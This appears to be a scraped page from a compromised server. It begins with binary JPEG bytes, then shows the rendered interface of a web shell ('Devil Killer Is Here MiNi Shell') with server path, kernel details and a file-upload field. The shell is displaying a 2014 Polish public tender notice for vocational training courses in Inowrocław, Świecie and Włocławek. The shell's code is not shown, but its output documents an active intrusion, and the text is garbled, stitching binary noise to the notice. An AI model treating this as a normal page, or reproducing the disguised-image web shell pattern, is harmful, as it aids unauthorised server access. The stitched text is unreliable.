JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140123/15275-N-2014.html

<p class="kh_header"><b>Toruń: Zorganizowanie i przeprowadzenie kursów zawodowych wraz z badaniami lekarskimi, materiałami szkoleniowymi i egzaminami dla 60 uczestników projektu OHP jako realizator usług rynku pracy, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki Priorytet 1, Działanie 1.3, Poddziałanie 1.3.3) w Inowrocławiu, Świeciu i Włocławku.</b><br>
<b>Numer ogłoszenia: 15275 - 2014; data zamieszczenia: 23.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kujawsko-Pomorska Wojewódzka Komenda Ochotniczych Hufców Pracy , ul. Poznańska 11/13, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6547068, faks 056 6529619.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.kujawsko-pomorska.ohp.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Jednostka Budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kursów zawodowych wraz z badaniami lekarskimi, materiałami szkoleniowymi i egzaminami dla 60 uczestników projektu OHP jako realizator usług rynku pracy, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki Priorytet 1, Działanie 1.3, Poddziałanie 1.3.3) w Inowrocławiu, Świeciu i Włocławku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursów zawodowych wrazz badaniami lekarskimi (w przypadku zawodów wymagających stwierdzenia przydatności do ich wykonywania), materiałami szkoleniowymi i egzaminami dla 60 uczestników projektu OHP jako realizator usług rynku pracy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki Priorytet 1, Działanie 1.3, Poddziałanie 1.3.3) w Inowrocławiu, Świeciu i Włocławku.
 W kursach zawodowych będą uczestniczyć osoby, dla których umiejętności w zakresie przewidzianym dla danego zawodu zostały zdiagnozowane przez doradcę zawodowego lub lidera klubu pracy i są niezbędne dla dalszego kształtowania ścieżki rozwoju zawodowego każdego uczestnika.
Szkolenia będą odbywały się w sześciu częściach:

CZĘŚĆ 1
Kurs magazynier z obsługą kas fiskalnych z czytnikiem kodów i wózka jezdniowego oraz badaniami epidemiologicznymi dla 10 osób w Inowrocławiu - zakres szkolenia obejmuje zagadnienia potrzebne   do uzyskania uprawnień obsługi  urządzeń transportu bliskiego; uczestnicy poznają zasady magazynowania oraz obsługi kasy z czytnikiem kodów. Szkolenie będzie trwało 150 godzin, w tym 60 godzin zajęć teoretycznych i 90 godzin zajęć praktycznych. Godzina lekcyjna szkolenia liczy   45 minut zajęć.
Część teoretyczna szkolenia musi uwzględniać następujące zagadnienia: 
typy stosowanych wózków jezdniowych, 
budowa wózka,
czynności operatora przy obsłudze wózków przed podjęciem pracy i po pracy wózkami, 
czynności operatora w czasie pracy z wózkami,
wiadomości z zakresu ładunkoznawstwa, 
wiadomości z zakresu BHP, 
wiadomości o dozorze technicznym, 
obsługa kasy fiskalnej z czytnikiem kodów,
gospodarka magazynowa.
Po ukończeniu i pozytywnym zdaniu egzaminu, uczestnik otrzyma Zaświadczenie o ukończeniu szkolenia oraz Zaświadczenie kwalifikacyjne Urzędu Dozoru Technicznego.
Szkolenia teoretyczne odbywać się będą w Ośrodku Szkolenia Zawodowego w Inowrocławiu, ul. Cegielna 14/16. Zajęcia praktyczne muszą odbyć się na terenie Inowrocławia, a Wykonawca zobowiązany jest do zapewnienia pomieszczeń, sprzętu i materiałów szkoleniowych we własnym zakresie.

CZĘŚĆ 2
Kurs szwacz - tapicer dla 10 osób w Inowrocławiu - szkolenie obejmuje informacje z zakresu: podstawowych przepisów bhp i ergonomii  pracy w zakresie obszaru zawodowego, zastosowania  rysunku  technicznego, wiadomości z maszynoznawstwa - zasad stosowania narzędzi i maszyn  niezbędnych w tapicerstwie, materiałoznawstwa  - zasad stosowania materiałów niezbędnych w tapicerstwie, zasad oszczędzania materiałów, energii i urządzeń. Szkolenie będzie trwało 150 godzin, w tym 60 godzin zajęć teoretycznych i 90 godzin zajęć praktycznych. Godzina lekcyjna szkolenia liczy 45 minut zajęć.
Część teoretyczna szkolenia musi uwzględniać następujące zagadnienia: 
podstawowe przepisy  bhp i ergonomii  pracy w zakresie obszaru zawodowego,
technologia,
zastosowanie  rysunku  technicznego,
maszynoznawstwo - zasady stosowania narzędzi i maszyn  niezbędnych w pracy szwacza-tapicera, 
materiałoznawstwo  - zasady stosowania materiałów niezbędnych w pracy szwacza-tapicera, 
zasady oszczędzania materiałów, energii i urządzeń.
Po ukończeniu i pozytywnym zdaniu egzaminu, uczestnik otrzyma Zaświadczenie o ukończeniu szkolenia.
Szkolenia teoretyczne odbywać się będą w Ośrodku Szkolenia Zawodowego w Inowrocławiu, ul. Cegielna 14/16. Zajęcia praktyczne muszą odbyć się na terenie Inowrocławia, a Wykonawca zobowiązany jest do zapewnienia pomieszczeń, sprzętu i materiałów szkoleniowych we własnym zakresie.

CZĘŚĆ 3
Kurs kelner - barman dla 10 osób w Świeciu - celem tego kursu jest przygotowanie uczestników kursu do pracy  na stanowisku kelner - barman. Szkolenie będzie trwało 65 godzin, w tym 50 godzin zajęć teoretycznych i 15 godzin zajęć praktycznych. Godzina lekcyjna szkolenia liczy 45 minut zajęć.
Część teoretyczna szkolenia musi uwzględniać następujące zagadnienia: 
historia napojów mieszanych,
sprzęt, wyposażenie i aranżacja baru,
sylwetka barmana,
etyka zawodowa,
obsługa konsumenta,
elementy psychologii i typologia klienta,
towaroznawstwo i miksologia napojów,
ocena jakości napojów,
technika miksowania napojów,
elementy rachunkowości i system rozliczeń,
estetyka i aranżacja baru,
obsługa imprez okolicznościowych,
profesjonalna obsługa klienta.
Zajęcia praktyczne muszą zostać przeprowadzone w lokalnej restauracji  lub klubie.
Kurs kończy się egzaminem i uzyskaniem zaświadczenia o jego ukończeniu.
Szkolenia teoretyczne odbywać się będą w Ośrodku Szkolenia Zawodowego w Świeciu, ul. Chmielniki 2B. Zajęcia praktyczne muszą odbyć się na terenie Świecia, a Wykonawca zobowiązany jest do zapewnienia pomieszczeń, sprzętu i materiałów szkoleniowych we własnym zakresie.

CZĘŚĆ 4
Kurs spawacz metodą MAG/TIG dla 10 osób w Świeciu - zakres szkolenia obejmuje zagadnienia, po których przyswojeniu uczestnik kursu uzyskuje uprawnienia do wykonywania spoin pachwinowych blach i rur ze stali ferrytycznych metodą MAG i TIG. Szkolenie będzie trwało 220 godzin, w tym 30 godzin zajęć teoretycznych i 190 godzin zajęć praktycznych. Godzina lekcyjna szkolenia liczy 45 minut zajęć.
Część teoretyczna szkolenia musi uwzględniać następujące zagadnienia: 
Poznanie procesów spawania i materiałów spawalniczych,
Poznanie urządzeń do spawania i technik spawania,
Przygotowanie materiału do spawania.
Po ukończeniu i pozytywnym zdaniu egzaminu, uczestnik otrzyma Świadectwo Egzaminu Spawacza oraz książeczkę Spawacza Instytutu Spawalnictwa w Gliwicach.
Szkolenia teoretyczne odbywać się będą w Ośrodku Szkolenia Zawodowego w Świeciu, ul. Chmielniki 2B. Zajęcia praktyczne muszą odbyć się na terenie Świecia, a Wykonawca zobowiązany jest do zapewnienia pomieszczeń, sprzętu i materiałów szkoleniowych we własnym zakresie.

CZĘŚĆ 5	
Kurs pracownika robót wykończeniowych szpachlarz dla 10 osób we Włocławku - szkolenie z zakresu przygotowywania, wygładzania i wykańczania obrabianych powierzchni metodą szpachlowania, usuwania starych powłok malarskich i nierówności, sprawdzenia przyczepności, wzmocnienia i wyrównywania chłonności podłoża (gruntowania), uzupełniania ubytków i pęknięć, montażu listew narożnikowych, szpachlowania warstwą wyrównującą, szpachlowania warstwą wygładzającą i szlifowania powierzchni. Dodatkowo uczestnik pozna elementy pracy z grupy klasyfikacji zawodów - robotnik budowlany robót wykończeniowych i pokrewnych. Szkolenie będzie trwało 168 godzin, w tym 30 godzin zajęć teoretycznych i 138 godzin zajęć praktycznych. Godzina lekcyjna szkolenia liczy 45 minut zajęć.
Część teoretyczna szkolenia musi uwzględniać następujące zagadnienia: 
zasady i przepisy BHP, ochrony ppoż., ergonomii, ochrony środowiska w zakresie przygotowania powierzchni do szpachlowania;
omówienie rodzajów tynków;
omówienie dokumentacji technicznej w zakresie rozpoznawania powierzchni do szpachlowania;
omówienie metod sprawdzania przyczepności powierzchni;
omówienie rodzajów materiałów odtłuszczających;
omówienie rodzajów materiałów wypełniających;
omówienie rodzajów materiałów do wzmacniania, wyrównania chłonności podłoża, zwiększania przyczepności (materiały do gruntowania);
omówienie rodzajów materiałów do likwidowania rys, pęknięć;
omówienie metod przygotowania powierzchni do szpachlowania; 
instrukcje obsługi narzędzi i maszyn wykorzystywanych do przygotowania ścian do  
szpachlowania;
omówienie sposobów przechowywania narzędzi i maszyn.
Część praktyczna szkolenia (roboty wykończeniowe, szpachlowanie) musi uwzględniać:
praktyczna nauka posługiwanie się instrukcjami i dokumentacją technologiczną; 
praktyczna nauka doboru rodzajów tynków, usuwania uszkodzeń i wad powłok szpachlerskich; 
praktyczna nauka oczyszczania powierzchni do szpachlowania;
praktyczna nauka wzmacniania, wyrównywania chłonności podłoża, zwiększania przyczepności powierzchni (gruntowanie);
praktyczna nauka przygotowywania materiałów wypełniających do nałożenia na powierzchniach;
praktyczna nauka przygotowywania powierzchni do szpachlowania;
praktyczna nauka dobierania narzędzi do szpachlowania, materiałów do wyrównania i gładzenia ścian, sporządzania zaprawy;
praktyczna nauka szpachlowania ścian;
praktyczna nauka szlifowania szpachlowanych powierzchni;
praktyczna nauka oceniania jakości powierzchni po szpachlowaniu; 
praktyczna nauka obsługi maszyn i narzędzi związanych ze szpachlowaniem.
praktyczna nauka elementy pracy z grupy klasyfikacji zawodów - robotnik budowlany robót wykończeniowych i pokrewnych.
Po ukończeniu i pozytywnym zdaniu egzaminu, uczestnik otrzyma Zaświadczenie o ukończeniu szkolenia oraz Certyfikat uprawniający do wykonywania zawodu pracownika robót wykończeniowych szpachlarza.
Szkolenia teoretyczne odbywać się będą w Ośrodku Szkolenia Zawodowego we Włocławku, ul. Plac Wolności 17. Zajęcia praktyczne muszą odbyć się na terenie Włocławka, a Wykonawca zobowiązany jest do zapewnienia pomieszczeń, sprzętu i materiałów szkoleniowych we własnym zakresie.

CZĘŚĆ 6
Kurs przedstawiciela handlowego dla 10 osób we Włocławku - szkolenie to przygotowuje teoretycznie i praktycznie do pracy w zawodzie przedstawiciela handlowego. Szkolenie będzie trwało 150 godzin, w tym 30 godzin zajęć teoretycznych i 120 godzin zajęć praktycznych. Godzina lekcyjna szkolenia liczy 45 minut zajęć.
Część teoretyczna szkolenia musi uwzględniać następujące zagadnienia: 
zasady i przepisy Bezpieczeństwa i Higieny Pracy;
omówienie technik sprzedaży;
omówienie wybranych zagadnień z prawnej ochrony rynku i konsumenta;
omówienie Korespondencji handlowej;
omówienie towaroznawstwa;
omówienie podstaw komunikacji;
omówienie zasad marketingowych;
omówienie etyki zawodu.
Część praktyczna szkolenia musi uwzględniać:
praktyczne przygotowanie uczestnika do zawodu przedstawiciela handlowego;
praktyczne usystematyzowanie wiedzy na temat roli przedstawiciela handlowego;
praktyczne poznanie metod oraz technik przydatnych w planowaniu sprzedaży;
praktyczne zapoznanie się ze standardowymi krokami wymiany handlowej;
praktyczne przetrenowanie perswazyjnego formatu prezentacji produktu;
praktyczne rozpoznawanie typów klienta;
Po ukończeniu i pozytywnym zdaniu egzaminu, uczestnik otrzyma zaświadczenie potwierdzające ukończenie szkolenia oraz Certyfikat uprawniający do wykonywania zawodu przedstawiciela handlowego.
Szkolenia teoretyczne odbywać się będą w Ośrodku Szkolenia Zawodowego we Włocławku,  ul. Plac Wolności 17. Zajęcia praktyczne muszą odbyć się na terenie Włocławka, a Wykonawca zobowiązany jest do zapewnienia sali szkoleniowej we własnym zakresie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada wpis do rejestru instytucji szkoleniowych prowadzony przez właściwy miejscowo Wojewódzki Urząd Pracy lub akredytację MEN.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi udokumentować posiadanie wiedzy                   i doświadczenia poprzez wykazanie realizacji, z należytą starannością, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług polegających na zorganizowaniu i/lub przeprowadzeniu                     lub organizowaniu i/lub przeprowadzaniu 2 kursów zawodowych odpowiadających swoim rodzajem przedmiotowi zamówienia, (w zależności na którą część wykonawca składa ofertę), o łącznej wartości brutto przynajmniej 20.000,00 zł w ramach których uczestniczyło co najmniej 20 osób. Usługi powinny być potwierdzone dokumentami poświadczającymi, że zostały wykonane należycie np. referencjami lub protokołami odbioru.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy dysponują lub będą dysponowali osobami, które będą uczestniczyć w wykonywaniu zamówienia, a osoby te posiadają stosowne uprawnienia, o ile są wymagane odrębnymi przepisami. Wykonawca musi udokumentować dysponowanie odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia poprzez przedstawienie imiennego wykazu co najmniej dwóch osób które będą uczestniczyć w wykonywaniu zamówienia i które legitymują się kwalifikacjami zawodowymi, doświadczeniem odpowiednimi do funkcji, jakie zostaną im powierzone (tj. przeprowadziły  co najmniej jedno szkolenie z tematyki adekwatnej do przedmiotu zamówienia), w zależności na którą część wykonawca składa ofertę,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie w realizacji kursów zawodowych dla młodzieży zagrożonej wykluczeniem społecznym - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W szczególności Zamawiający, dopuszcza następujące zmiany warunków i treści umowy: a) w przypadku stwierdzenia przeciwwskazań lekarskich do uczestnictwa w kursie zawodowym, wówczas uczestnik kursu zostanie skreślony z listy uczestników i nastąpi zmniejszenie wynagrodzenia Wykonawcy o koszt przeszkolenia skreślonego uczestnika. b) w przypadku rezygnacji uczestnika z kursu zawodowego, powodującej skreślenie z listy uczestników projektu, nastąpi zmniejszenie wynagrodzenia Wykonawcy o koszt przeszkolenia rezygnującego uczestnika. c) zmiany danych Wykonawcy (np.;. zmiana adresu, nazwy) lub zmiana wynikająca z przekształcenia podmiotowego po stronie Wykonawcy, d) zmiany osoby reprezentującej po stronie Wykonawcy lub Zamawiającego e) zmiany pracowników upoważnionych przez zamawiającego do odbioru usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kujawsko-pomorska.ohp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kujawsko-Pomorska Wojewódzka Komenda OHP w Toruniu ul. Poznańska 11/13 87-100 Toruń..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2014 godzina 10:00, miejsce: Kujawsko-Pomorska Wojewódzka Komenda OHP w Toruniu ul. Poznańska 11/13 87-100 Toruń, Sekretariat pok. 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursów zawodowych wraz                   z badaniami lekarskimi (w przypadku zawodów wymagających stwierdzenia przydatności do ich wykonywania), materiałami szkoleniowymi i egzaminami dla 60 uczestników projektu OHP jako realizator usług rynku pracy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki Priorytet 1, Działanie 1.3, Poddziałanie 1.3.3) w Inowrocławiu, Świeciu i Włocławku..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs magazynier z obsługą kas fiskalnych z czytnikiem kodów i wózka jezdniowego oraz badaniami epidemiologicznymi dla 10 osób w Inowrocławiu..</p>
